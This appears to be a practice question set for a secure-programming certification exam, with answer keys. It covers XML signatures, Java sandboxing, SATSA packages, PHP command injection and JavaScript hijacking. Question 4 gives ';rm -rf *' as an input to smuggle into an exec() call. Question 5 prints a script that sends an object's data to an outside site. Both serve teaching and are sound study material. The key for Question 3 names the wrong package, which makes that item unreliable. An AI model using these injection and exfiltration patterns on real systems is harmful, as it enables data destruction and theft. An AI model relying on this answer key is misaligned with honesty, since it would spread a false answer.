



312-92^{Q&As}

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QUESTION 1

Jonathan is creating an XML document and needs to sign data streams. In his code, Jonathan creates a signature node that is contained within the signed datastream. What type of signature signing has Jonathan employed here?

- A. Enveloping
- B. Attached
- C. Detached
- D. Enveloped

Correct Answer: D

QUESTION 2

Kyle is a web developer for Innovative Incorporated, a web development and graphics designing company in Dallas. Kyle is currently working on a web-based application for a client that wants dynamic and rich content on their site. Kyle is going to use java applets and flash animation to make the website really stand out. The client was adamant though about making sure the site used security features to ensure that the site itself and visitors alike would not have issues.

What Java security feature can Kyle use in the development of the site to add security?

- A. Sandbox
- B. JavaScan
- C. Java quarantine
- D. Limbo

Correct Answer: A

QUESTION 3

Julie wants to use some of the Security and Trust Services API's for a program she is writing that will work with mobile devices. Which SATSA security package should Julie use if she needs to support basic user-certificate management?

- A. javax.crypto.pki
- B. javax.microedition.crypto
- C. javax.microedition.pki
- D. javax.security.crypto



Correct Answer: D

QUESTION 4

William, a software developer just starting his career, was asked to create a website in PHP that would allow visitors to enter a month and a year for their birth date. The PHP code he creates has to validate the input after it is entered. If

William uses the following code, what could a malicious user input to the year value to actually delete the whole website?

```
$month = $_GET[\'month\'];  
  
$year = $_GET[\'year\'];  
  
exec("cal $month $year", $result);  
  
print "  
";  
  
foreach($result as $r)  
{  
  
print "$r  
";  
}  
  
print "  
";
```

- A. ";gf -rm *"
- B. ";dfr -php *"
- C. ";php -rf *"
- D. ";rm -rf *"

Correct Answer: D

QUESTION 5

Travis, a senior systems developer for YNY Services, received an email recently from an unknown source. Instead of opening the email on his normal production machine, Travis decides to copy the email to a thumb drive and examine it from

a quarantined PC not on the network. Travis examines the email and discovers a link that is supposed to take him to <http://scarysite.com>. Travis decides to get back on his production computer and examine the code of that site.



From the following code snippet, what has Travis discovered?

```
function object() {  
  this.email setter = captureobject  
}  
  
function captureobject(x) {  
  var objstring = ""  
  for(fld in this) {  
    obstring += fld + ": " + this[fld] + ", ";  
  }  
  obstring += "email: " + x;  
  var req = new XMLHttpRequest();  
  req.open("GET", "http://scarysite.com?obj=" +  
    escape(objString), true);  
  req.send(null); }  
}
```

- A. URL obfuscation
- B. XSS attack
- C. JavaScript hijacking
- D. URL tampering

Correct Answer: C

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